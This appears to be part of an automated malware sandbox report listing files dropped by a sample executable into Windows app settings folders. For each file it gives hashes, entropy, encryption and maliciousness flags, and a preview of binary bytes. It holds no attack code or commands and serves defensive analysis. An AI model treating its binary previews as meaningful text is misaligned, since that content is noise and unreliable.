                  Preview:7.....yEU....w....G`%*YJ;r..39.>...6...U......@..%.ru......4?.Mi..Y.2........C...q.H".x....U1Z(..;..k....J.MB..G..dG.5#.n...X.......4.'I.T}k@,,.....7U.......@.B(].@M:..<.P.uy....K....y...c..6....vI..n#k.q..w:.H(.Q..[....1P...Zr.M...vu........O.... ..Y....f....I.<..."....o.u<.hbu...,=_.I..J.!S.b%A..@&..b.{..U......f.J..|..X..cN.y..pJ...W...G7...F..d.7.+..8..k...h.....Z"E.%/..H.+.....<5.y.4_.......NZ}.}+..OA.\..3dN..C2.F.~..yg%t-7.."}.....".n..1..*.x>0.....5.QL.[U....vG...{|]..Ahy.L..U.x.]/...N......g.H.d...%.w.^B.9.H.:....P.t.j.(:3+.r~.z...a......f...oB;..e.l..gK./V..K......'W..f..M..#aI.}s..fx..R.......C".Pp....D,..wR..?.;q....._3."..P.p#.\z.....dAe.RW.+z...._......g..Y.......G...g.g=~..i..g.......D.~[H.=h.....i..</...`..)~Rra...]w..d#....o/......4..a.....]_....6.Y...i...A...C.)......]..-..R.x+H..F....[b..".....L...c..,.jx..V.l.6.a:..."....6.......;......3.BsjY..}.o...... ........)....0.A.P.(H..#..(..U..td ....H...b..M~x....z.H.o

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65870
                  Entropy (8bit):7.997231587270536
                  Encrypted:true
                  SSDEEP:1536:B+pfLuxJSOc4xQ9I8pylUFrWQ5OmJNUd2:kpfLxd4x/8ioySDJ2d2
                  MD5:B23423193F74235669CCD641A7AF7AAC
                  SHA1:610F8DA7241E5D6ECAB92624DC2380BFDE1AD02D
                  SHA-256:471FBEF16ACCE2663FCD4BF340FA5090D2A14750A1878D90B751134ABB05E087
                  SHA-512:7D353CF69900DC29B37A9C4E3B4FDBBE75CB86C8B3BB56DCA7A2F54858E28D2100A2C4CB5820D7A800F5CBC6C1D0F2E3B21D963ACE697B675EC788F1E49F7E01
                  Malicious:true
                  Preview:...........\F.;.K.74>...'N..D*.+.....$pwy...\...AN.....H...j...n*z....-..h.N......'.....}.M.\br..G...~.F...~....vh..k..C.l~nb....$-....{H/........8.9.E.@....w.......5mc>....l..3..\.k'Rr.....Q.n.M-$B.h...M..S9qn.....y/g.3f\.X\..8A..Af.x....D..V.-.#7...7...s..Bs..*t.(.w.#uR..~5A...].Y....P.N...*......*....3x&MT{..f.....HFm)..!.6C......~.cb@.......q...b...l.XL.........J....XjJ..M.!e...nq5.....,.O...Z........M......!D.{.f.6.s*,.2...~.1G.^....[.X.........J.....V'...E.<.......7N.(]`...yp4.......@....h...4....H.EW%...,.. bV.....L..8ip.b....(......{<..&..Y7;_~I.~m.....-.e...Q...w&.m...,s.X......{.>IT4....D"R..c.h=..W....`...-.`....q..tvhL.%..o$....{...`i.'.....'/....W.q..4.z.s].*J..N&x..&DZ..j.5..(.POi.0h.&...o........fi.....u.$...IS..*W9..=d..Q.J..!....^...O...gR..z....j..Ef.a.%...Pt.0a......a...o.....q.F...?.......V...t..C...d2......|{".7.+.....).\.DqYn9.J..a.jaq).#...v.*>.....Uz..65#...u.........<.M."...W.Vn+....`8i.C!..}5.9...kp<<a..f.9z

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9810893340701465
                  Encrypted:false
                  SSDEEP:192:N+CDWUEkbVXDc6PGwvCQ8hhiozCtUuObtgYhyB6qvPY:klnkbVXRShNCoyBHY
                  MD5:BB112747906FFD184452BB00B94EF538
                  SHA1:A0299672F349FD6FD8070F0B31D715FF9E1E75CF
                  SHA-256:B8BDC2C6CE7CD5F996032C0184DD18AB6A5A057FB59BDC06B2DC18D6B1C65D37
                  SHA-512:8FA54E3D4CAEC94A42978659825C948E444EAA09D888DB86B57E610D570C80C1AD7DDC13F3D51DFAB767BF6E688B4F7ABF827CAA6C0D791E0DC3698E85B8E9E9
                  Malicious:false
                  Preview:regf....T\...Q .._..+V..oW..yJ.....x..A]d(.%-X..l.E.. ...............&..(..Y..0.-G.5/.!MZ."..r.B.....{p?Qx........*#^.3..Rs........s,.ZF.g..v....A..n.*...y..{3...h..'....}^..Gz.z....`....Z..v.9fy<..=@...Qa..=TTM...~l..3.n.O..W....0Wz@..V....T .t.S..F1.H....rw.M....$%.......2.Y.`..;.C*...GZ).......S....8Z.).lj.i.0...f.0`.3p.z.IS...]K.....R.a{.c@.OV..#.l....%h..S^...n..<..2..q.,.3I.C...<;.....'..j..B~}..5.).o%,:..)d.L...........k..2@..IJ$.t....;l...j...{r..[w.EsDh<&`....p{.3.D.D&.^oc.......#.B..!.n~.=.zA.. +..%..|..;!&>oY.L.]S.\p.&{....o.[.r.(..s}$....[...........+=...[DG. j....h..Q..3....a.pWz715I..$...F.g.[..I7a..C.AI.P.h}...-.....KR.._g[.B|...f+h..F.......3R.i.....Y.v.%/h..."l.S.Su.{o`....` .....~>,.\c_.pm.u.-.@..OTl.<...t!.i.._?.,....q..I@.../.}.j..&.%.A,.q?.........G..6.W..>........(.zL1..&vt`.'d...f.@...6i....u.xW.....Iw{.....R.b.g.w.c.......Z...^dt.H:6.....Y>v[G{n...SIX..7..4KfaR.."L.S|.(.....C..r.....f...3..5{.VM..L.........!M......_.*q..i

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.980660587640491
                  Encrypted:false
                  SSDEEP:192:88/yGbs0QNMTc4QG6kDjOiTv0XOqWg2sNatzfVk+8Xk+IyGq+jR6:5PbdQNsLTmZABfyIyGDw
                  MD5:13918F67769F7C3AEC90B34A81D51A7C
                  SHA1:56759E1BD3BC54BD881B82EA9C4EA470DAC88F53
                  SHA-256:A8E855ED94AA7F27D780E71F47803D3A586180C70DB574CB5517AF5F017ED8BC
                  SHA-512:4F518F21EC7B0A67743F69CBE250EE32E6C84B800954FA6938C14E6F72DD1FAEBC95EBAE96EB4E8D915585BEC0577F431BD14FC501F38D8F75FA92F9BF358D20
                  Malicious:false
                  Preview:regf..!.........-kX......F...^..)r..\~..GZ;.I.W...G_.C.C...f..6<J.iJ...&.d4....3Y4..r.T...j..<HCn:[..y.}D.K..:.)d....+X..KR.E.nT..ofV.?q..Q...1.tZ..e.:.%G...V|4..0dG.-\..H.....l.T..x...e..]..c".D..=.......&.$.`..j...\O..=...'.&...4.q.O..g% .Nj.....6Tg.G.o."bG. `=y...m.%.\#l.u@>..7..FbAQX*+........r...+.......l.:.+{G.eUI....b.Va...$.5N:.....]...w.I.`...Z...C.Z.......h....kC.S.M.......p.....h,H..Z..L.....,..W....uZ.....F..nn.+...2........z....,t.#..LG.."..4...C.F...n...E}..!.C.}...8..f..H.....BaM.a@...+h...u..E. .g.X.?..i.i.....V.#@..h..|.Q:YS.Ye.b.-......M@R.>....]'.9'U.v0......lCY......0....ua.Db..|..+.9cR.]..L,.."M>`.z...u@.&.....x'd....0...Y.(=t...4..,..Z.....'$;...1c...dfD..u......l.dF:. qx....i_V....I>$..(-...Q.l.j........xBy.......t..(5..........<.IV.p......pC..<...2tY.>..F..-..G.?#.dy.....!..B....._m.Yj...(.)S.j;..I{-au....w.@.6.! .$.h.2...:p.$3u.j#.Q....>.O%9.,!...-...7N.......i.B.7.l.skg....`-..[.n...y.v.E..,..........k...c'....

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9757646904859065
                  Encrypted:false
                  SSDEEP:192:jV4A6PV6Ftw/OoOE2j7L1TdDuAUPhy+wYB1m3Xq4pKStDMvn2v8k:5P6PV6joOESNBCtg+zmXq+KStYvSH
                  MD5:992A348F1DE341CF9A44633FC083E554
                  SHA1:977F22B7DBFB7F1DAD56BFE9E8DE96D2A24574EB
                  SHA-256:098F9DC4C261603741A6AA824B0AF31995E8D81251CC64B088CA838D4C9724FC
                  SHA-512:A16EED0B80D020087F138071105C9D30192B7D1DDBE8D81912963FF1E551D3A5CF98E2E630A99FEE0E79E5759672C4D510B3732CC802BEA5C746947596082949
                  Malicious:false
                  Preview:regf..(W.=..}.j...B.@..'.j ..g.4.....k..jM.?..Q......DC...$}[9.A..d9e.......9..y. Y.7..1S$..b..+`..P6...@....r.'._.c...8....wf.2.i..O. ...<2..U.2...M=P.|.9.....t....6..!..7]I7........L.A..,...v.G..^....p.6.;..`..1p%.c<.iy..3/.r.@p.d....{m.......G..._}[.+.X...QF....7.P.....X.8..T...lY.....#P.bi......Y.....J.'..a).....[...A.I..5P.d.........`.el7.]...SRh./"...&...U...).NV...a...tR.s/V..'.u..y .^..a..t.]......$0..*..h.+ ...i.1...S3....m..@".A.Jt1...].V <./...1....G.c(.R.j.-=...].Gt.I..LW.......k4La...xjNT!~...d..e%..>...R..N`.+.....u..z.<.;.6..E.r>zw....6..O.1..%V...J..-.>..(P.b.n..HH0f#..........T@..Z....m..c.r.......E.......Pb;%..-\#|dn....K(^..~gL.0....J.chPK.W.WA....z..v.w...3x.8A#:.30!.M.M......X...rI....FGp.F.3.Dz.QR..v...nw.....]."$?.)G4..(R8..7}...t./:...O....h.7..&r....N.(.1h..."..!.Q.*O.HIC.\;k....7.w.k.....T...+%....:.].K.X+.T..+W.$..d...Nc._I....]........[1..2..^.{\G.\..y.^l.....G..........L..........`.<G.^*.-f.....A....Fi.J..p%Uc.X...c

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):39476
                  Entropy (8bit):7.994430625781655
                  Encrypted:true
                  SSDEEP:768:ivk5PUM1pdGnz0S7gtewkK31TLGdJ78tjnx2TqA398sO6fLsZOQzx6HZ99UL:B5PU0G0wRs1GD4tjxu1iwTvQzx6H1UL
                  MD5:03349E55F594612DDE1286D762223796
                  SHA1:1C04C04F31EF58CAA5074904DA28FCCF078275A8
                  SHA-256:0D75A18FC9FAD683BB3C163C1D2DA8EDCF86EC97AE76F720C655AD4709C17A0C
                  SHA-512:3BA0E41886AF4CDF8CBB2CD02F0B1418C10B490E3949D51FBE18BF03D6AEA7608361EAB4D48F95E1936D3F0E2B8A731B46C6164F1743ABCDD8A7A48D30C55543
                  Malicious:true
                  Preview:..].N..oU..~.......!..b.AE..l..u.f...!.....,#^....i...i.4..i|.E.3.a..m...:4=!....G.Y.M.#]X...2|+.i.[.k.Q../.%.E..,.....G.:..te.v........B....A=i..9.8K....44{%.vt...i5...D.^.....9....R....r.A...7w.l...@....i.d.......'.O....P.W...^_.......X..r...)!...._.=A..E..<.QJ.j_^A .....$.B$....U...I.3.W..a^.q.M.nO..I.......F .?...4.p.Qlg.8.go.......I.Jb..#..v....v..c...Os.#.H./ROf..pH..;...g.~\...S...D...i.!a....;..4v...K...vdx..qf.t.5.d.W...:X..`...:y.*..;....0.Q.M.D..zQ.c.<T.....5..*....=^x.q2S.^y.._U....L....8W..:.......q......U...6..vM.A..}=*...g..GWvDG.b.n5W.2.,6..x...*....=s".H..1.,..*..M..D....i:....8.5&.....l....>..../9Z_.......R.TW|k.Vl~+....x..j@..Y..qW.e..O...R....I..GF#p.s...7Z....i<..7`..I.o._....#.o..?;/.....3..SJ...%+.M..@.^........h...k.k?..]r....fj.r o...S.6..^y....T..X...I.........0I.v.;.Y.G.3..yk.w...An.[i6..9.L..a.JF)......x.J'.h........L-......A.;.8.]..z....,G...";.9...(....X_..'-.S3..._............)...!.TDj?..dV

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.980648262770271
                  Encrypted:false
                  SSDEEP:192:2JntcOQwFPxg/mkLvByi60Qtqyj1z7ufMKJTK8D3:pegJY0QUguRJZ7
                  MD5:20D2767747D5EE4691E607555D0B8F69
                  SHA1:FFF4C0F8AF7D36BD71DAFA28FDA5EAE028C9174E
                  SHA-256:7F8E94E6926DF15A766031D5D7A0B605E959E5DDAB5B082763401C9863E0C8FA
                  SHA-512:9B0815F3DC2F7F5283448C41D67D479241B1089E0C526993FC19432F2B3FDA71244D93B55C7C324652D11337A59E23E18E6E2A08FC73E1BAED37DE3EFEEBF578
                  Malicious:false
                  Preview:regf./Y.....4}..h..@.#..(....E.^...<eH9......!|..C`.....Q.5X....e`..W.w..N~.7.m..]..+.2..N....Mp.|.tp].....3H.'K3.../d.;...8...ce.3.......y.H.K2.~.ch..wZ.Ir......~.`n....BW.....>.h.../.c.....?f9.W5qT6....+.m.?.A.U..3j....$L&.Y#..]Y...@Z.:^..w.+....z..\I...w.%:0.9..ly.y!..Se-.W......8..:........4...N.......Lx .a.>d....p=9.Q3\.....D...J....r6...n..y.[.N...$...f...Y._.{....XZ.4i...J..3.....:ji.(.$..8..a.b\.....+...NO.-.m..%d......... ....U...,..m..Tw.........EY.U..IM.......xY.....[W......w../..J.!.Y..p.&?..r.=^.qcL..3q..c..&~.HD..........8.XKH...:.hP.sH{nl....{vH.0w...."'T!@B^2w.v.<..O....Q..:..h....^Y+...z..I..`D....... U.w>..lmm.qR.&....O...|.7..@s.s...p]K......5...L.g...1.u5".t......5?1.Fl^._......R.H.8`\U.2...;....o(......O...RtT<.;...O-)..X"h7...3).B..N.<...?.!8lcM.x\...,...{.......?6E...^......O.xr....X.k.....}.@..at.<..s...u......(J..?e.0...*..p.}...S..X...I.t.c(+,.[:.Z..g....K...O%....9w...c....w.c)...n..y......\..}<f...-...Y..T0Oo

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.978294378034203
                  Encrypted:false
                  SSDEEP:192:imIJBGePuKFA70ilNUzhhcIn0n4vqXrlCQ7J:imIJBG9qCPUzhZ0n4vqXxCC
                  MD5:BF21F58C83B77F91174E0D3F077955BE
                  SHA1:0B8915EA30BF75E79CC669366E8889844BCAD76F
                  SHA-256:F3A7B721CBF51779808EA9778A6CB8FEB9BE642806DC8084DD96F23570F05570
                  SHA-512:01D3ABC3F1542938F53302873ED72CDFE0674EC570619E8C14ABEEBEB0F1A6381712E790FFE1151280BA5B50679859CC89BBECC28FABBE5AA8F1334663696B3A
                  Malicious:false
                  Preview:regf...owx. S. .![\=.DM".o0..dV..q..X.do.wY.0..\.R.k..F.$.......4*...=....<\..,T)$)c....a.PR..N.^.k...TZ|D......Y...~e..<...?O.[....4...'[M.6..j.:8................[.>.w.:......A.."...g).jg...ajr.G............_.j,[sw..."R.fL.y.thr...g*......]5)..'r.30.0.@....E.WB.g.....AHe.G,...ZO.qk.{2.#s.F.v...<4........9=L+Q..}.f.Pq3.1...A.9x....I...*.).&.^=.m......jx.mJa'd..Y.f.oJ....gS]..b.w.n...[..mS..M..........8.....+.DW...........1J.$.}..5..C.?P...8B....OU`....V..e.v.A../y.......^.>.#....J"..._.......C... ..8An.......Dh......=.....0.......1...S.Y...#.....".x....o.z|W, c.M.N...sH#E....c...*s.D.....x`..a.G+P..6.).......U..yQ...Q...H..#.W....K.....~......./.Z.@8D)o,L..........}...L..e.w..h..........0g!..>Qg.......Q..(..,.1..j~?......\>...Au\.}...IS%.A......V.u...ow.....Q_2..W..Q...,..a..L..R.._.oy1+.._../h.../I...+.1..'.c:..W.S.....bB.....~......r.@*.........}.....6:.t....-.0g..$....!.ylp.ciw...G...i.......}V....i.6..UC.z_

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):16718
                  Entropy (8bit):7.9872477828158965
                  Encrypted:false
                  SSDEEP:384:QrJJ6aaXflN18UefUSazXrDSGWAe0EE+n79PGNkMLV+laD:y6aaXf7efUSgaGWAid+NbclaD
                  MD5:E8EA9F9388117F1C9A75C77A3240831F
                  SHA1:8B85E52B688DEACDDC9BA03DB64993A61D4662EB
                  SHA-256:D242CC4E091E54EEBE5754C91F28ACFC3572783E3ADCC04A4995CF2D33C514DC
                  SHA-512:EE9167F5DCCD4CAD707A5D2C84D59614B78A7C8047E97CA6445C4E1B302217FF045D317C1966DCDE358D759614D6D5313C3A60506581F12792FE91C0B47A8C67
                  Malicious:true
                  Preview:regf.].ex.,k(n..H.UkZ.B..U..@.X....v...0=.-x...B.0.[I...u.0h..Z....+..9...j/h....W..(Lf.}/.&..... S.+.....w...Yf..3.z.V.2|_-.GPD.)N...o...j....".j h.k......1..`(.... v:.uy..x:...}...H-....E....$z:.......3.RsD}.}Y.p.....W.(GiS..m~.I.fCg.S....c&.......@.......Z.U..n..gK..Q.6.>`.........hF9...C..s6f......-.......:qgUNb.22...u.._>.....Z..8^...B...z...).G.uD.._.g....w.....$.....|.-,.!.yx9.kLu=...~r..1..h|S.p..9......"...V..A.27z.x...z.:....U.T..f0w..BW.p9.<fG... G-......e~..5|"..1.O.)MI.1yC.a4.4..2)}!i...>..m...Z....9....?.M.(.Q."='j..L4+.........1..#O.....19..7.......zQ|\/..5....6....r..?..U.I...M...?Q.,.P.m..A}...m..[k.x.....Z.J...M........)......G.ny..8.|...C8.l.j=Od..e..&hyc.....H...2...:(..[.YB...#!..u..E.>#.-i.]tJ..Y...>...4..H.g.6.b.'U...#...Xd.#;.U'2...F...;`..$O.6.;.....:....b..r;EMqs3..+....z[.:7.l`m..Y...Cn..=...9'1......I).w.1c=c..w./...Wl.70.D.W.......}.U...Q.r{.0Y....D[.q...<....;!.t^...=.^....Ny1.|...`k.....f........

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9779236504845175
                  Encrypted:false
                  SSDEEP:192:CzF6qElYzZeG3eSzsc9KUBra3LgUOahmQB1ukM8/CiOJiD17lA:sF6bYzZeG3PPZra37O+BrOi+
                  MD5:480F306AE81424B6F19B11CE0320ED97
                  SHA1:00B6FDFAEB398A0BCFA87B1DC3647011546A73DB
                  SHA-256:EFDE8971D4BD0F8C0EFA0448ED33F5497248A4BCEF0D212FFA83F260AAF5DB85
                  SHA-512:45AEA6C544B2DAC20D75D89C898F12B418EC6744E6BBC60FD3735271A10500A60C4275A2E6F72DE03B38189CE18FCD1DEC166EE689BE48DB55FF2AA142278022
                  Malicious:false
                  Preview:regf...9$...p9...D...7..d.2.Ar..-.......+..YR..~5..I.H.)rR..p..1.o..[..F{..a...}}_..17.c. ...MT...E. ..y...-e..}H%..B9. YC{.>.L0...:./j........RX$.....v..#..d..f.z$..m....%B..&..:.0^........o..n.......K.r....Y.....k...C...qn.......tPRy....oOK...4..k;.lc..:.'..7wgV..<IR..u....ey........G[.g. \..._MV.w..H_.*...`Yo....c@...D:..Te..^.....N...}.H.?W.2.|..T.Q.......aL...,..k..%<x.P.j.Kx..o...;...\S.#+.Z.q@...{..7....h.?k....7.....". sW.e..H..+Ll.E....Ci./..%.........V_..>b.6......oy...=.....w..=8.a...(.. .1.g.r3h...0.g... L..../h......MmXSOY...J..8..yz.]Z..+.^c.d-:+R.A.l.....{.b.Y...{.j.O]NGW...G].5...ld._.'..-....x...#.M...)A{.vY(r...>[..<.?O...uN:..L.F.i..\t.M.7.}.........Mb.....j.%iO{X.#!.B...0B.n.)...V..0....J.pd....-.mK..?...i..b.....@`7T*h.;8...O..".._....{......m...}.....b...7...|Z.bg..".....t.........:`k........$.^.:^....m..|f?..<5..=&.f..Z.l...wj..P..s..e.a..h.2...o.=>\...R.L.hV..T....j..&a..f.F.....M(p*.0.`,Y.[..NH.........4.rE....D....W.f.e..

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):33102
                  Entropy (8bit):7.99466125860757
                  Encrypted:true
                  SSDEEP:768:hbIYQmd85esXYZwGwSx0kll2+pBgBk6UGufQ9kxXZz51uGPBGfxY6f:yYQmd80CzTM7l2+0W6diRXZ9YGPBGfCO
                  MD5:4AE605C8EC92B4CC98173FA9ABA46AD5
                  SHA1:4B5E8C73BAB9EF3F0BC4E53FA5848AE2057EBDF5
                  SHA-256:28BE7518CEF7291C5752A2CAF25514D23DA4B0F46F73B50E789E8F4AECBFA670
                  SHA-512:91815C77B882F6DD13D85E242888AB2A9F1FA24E879ED4D485ABB136DC5712FE9C86149E4C5DE245D79C4328F415F321EAC1E384D83C40CB0FE8CA0DE11968FD
                  Malicious:true
                  Preview:regf.a..GRCE..GH..3.|c.#}.E...A...[....X5Fx9......p(1.f.s......N....iE.(.....[q}.=.........DJ.9..uP.k..o"d.........>(I...O.U.}....}..$......E@.M5.. .d@{O.....d.|.......]...@.J.ju.F$9.....3....cfz.#4.kbM.f....e.8....j[....H...h.B'......`.. ....d.....ps....D.U...\..2.z].D.=...Y/..a..i..z^.`.s.....B..Q..D.....\i.'\g..d.....<KJ).z;\...e;...P......S*7......r....|.B..k.......q(..{%..=...r.....v...*...TH<.>m!.e.d_.V6......u.:-.{..c..3aa(=..n.I0d.D......w..~W..M...>M...@......z+.9G.!wU...H.Se.u.O^.....s0..l'8.Q.d..3.6{...{8.L[Q}.gb..pV..7.~4i_....g......|......$I.S......#O..o.1..T9.#H.7...!...K..14.+.>f..0G.l._?F,..#..........P[(mY....)-......>3..*.z.}...WdZ.......J.v...z..miviL..|.L.^FO....n-pd...i.WP....fd0.P..,.N_.....b...c.kG...v,U..J....m%..5..S.*.....)$...V..(h1...+W>l.:.....:..J.\{....9........P..s.#..t#..k.d.&............D.(.P..Q7.....r.|.._..<....?....j...M4$O...1h.V.N.-.ev..`!..g?... g.......C..\...r..PV.4i.H..j..z.#.......2_.M....

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):45240
                  Entropy (8bit):7.9956314217618
                  Encrypted:true
                  SSDEEP:768:QMB4lNBbtxyIbghoGmGY2kGoNHbWTmcXjcktJNeT7DQf/aDT+IKyMWXe:QMBGXbtxyIbZZl2a7WTsSJNefD+S/+1d
                  MD5:AA276B275C6CE80022F894629D452C9F
                  SHA1:7A1B66B17CE186A2436347C996094FC58BF03511
                  SHA-256:F77A64088DAF2502E80F375AE74C07F679E2648CE3BF3BF1B359C9A644531528
                  SHA-512:C36AD73C4587F3FDCCAF0738DBDCB48B56D0228623FDFF6E6C62DB27C685277257A6010A30323A278C8EE19C92C7CB454E61E05D7272D2A8F0977472F9CD2F1E
                  Malicious:true
                  Preview:E..........jL(S1.F./px..W...........U..tIv.W(4.h..od..Iu.0*......h.`.B..Q.,.0"|?0;.....~......I ......Z.G..-...D.FU....?..&..d._..DD...4..I.l....#..(.y.......|C|EW.j..9I...;nx...aHm...+p4.1XB...........h..n]5.f...3c.=..<n.Y;<."D.D.....}...T!.o.`.n.4|#h1..Ru(Os.........}..5.....>8..K..+.....W....\/.........Yp.pb..4../.#...\.....:.U~...2f......D.v..'..0.x.s.....}..u5H.....)<....4.p..{...("..pLH.u.`4.l$..x.O....O&Z.8....M[..#.I,a{..0...._.ky]AL...D...(.:.u.?.&R.....(yw..X. qc.N.#'..\.../...<v%v%..w.C.".Y[.I....w..rr.{3d..A/3w7..3.?)mU....~anb....yj.t..^...l..S..S=Z%.......7..K.B...Q.-...*..u=.>..wWxv.l..o...D0H.p../...m....g.....-.c.5s`...1. ...8B.S!MM.....#.%;.G}..k..k..=.MZ....F<....b..[....`...$....l-;...(....,.d;@..(y....&..y.6...W.F.P..l......l...3.{.).h....T.B.....{..}Y.....W).=..FEIN.a=......hb.EZ4.of.r>..7B.6[...3<t......"...6..qm....b....u..8.......#......^...B..W..v....gj..1..l#xs*6........,Q.....s....Xn|.Gmq.v;..D5#..kc.O~.[~l3

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979924439836873
                  Encrypted:false
                  SSDEEP:192:zHEXQAGpZ/8hQ0MxAmZQpO0Pt9iMeMEIe5gtbUKwYLt:IQ/qNmmpvtEMewe5M
                  MD5:4C1B6C71DA49DC275C6DDC0247B84DC7
                  SHA1:0C7135A4B14CF7CA37353D19FAA2C412030A5277
                  SHA-256:E5864291E1E5BA5AA45AF5DCDD78D27EF75F46F4FAADA415B2EC32C5D70FCF49
                  SHA-512:D10C1604EA4A7835F9A582A06A9EB57A1BFCE4B52E2EF6AA3C48BDD866D01E6B022816AE752EA93CE213582618FD58C573AC5E8C9BB1F55B9A7FF58ABCE0DAE2
                  Malicious:false
                  Preview:regf....f....",jh+(.K6...1.o.Ypl... f}F..s.8L..NPl...n..h...hw..J.I.I..i\PLa.....`k..D....I.aQ.~.c..X:.r..D.HG..K%..c.M|.%.b$.<V..aq...Z.-..S..2.=.......vE...".Gs%IL .).V....l...T..L......H./...hs.(.x.....[i.CA.}.U.....GYGu...a.......#=..E..G.T..f$?.)...T.g. H\..P..`S.as.}.Z.....Y........bh5c.T.....*.=c.........X....9........Je.c....;.7...]$...J.zP...|.-H.0.f..E..){.Z7.c._.......j.....v.......>.....t$L....X.....E...3,J ....i...^..7........r......m._...h.....S..wJ......d..G.x.>*.1.n...|V..M&...^.C.J."....&.P..+".u.W9.gB.....6uA..|_H.Jl..x..@.....p......%.<..I.z.~x..".g..3-.X.."A..,-B..~._....q.JP..@.'.E.........w..mB.Z.1..r.b6..`...m.-.q.....l.z...1v......I.e27...i..["jm.G....\.-.jd.T..F..u....BQ..jg.....=Q.}K{..81|PU..e%.B*.&..p...R..(.N..3.8=;]..i.Q/L..._]..I.|.....g~....@..OF.@...I.'#O5.-.q..#...T...{6.......R.B\.......\...p...l.l6Z.@9'.E..T........vH!.Q...6............<)^...b.E.L*.!.......X...Gq...s.Vx.hj.....E...t..R.Z........jN

                  C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977840756289703
                  Encrypted:false
                  SSDEEP:192:jSoRfPOOasMrmjsHvoERECPWtvGCY+ZtwV5iC8Cv/j:99advvvESPV5ii
                  MD5:0693599B5E1C68FE8A6E4CB82F5201C4
                  SHA1:DC55B246BE4B31A3EA1B72E5CBCDA36F96CF20AD
                  SHA-256:954C95F321546581A1633322A545B7A0FFFBFD2A7B49AE0E876ACD697137D3CE
                  SHA-512:AD7EA9F65AC08CA16683D14C1A1E8C862F8C21E9B2B221A47E89250C18F13CB48ED05A9F2949B1F8F5CB066EDA0FB84DE0D838A064D240EAEF9A35A6C86F2424
                  Malicious:false
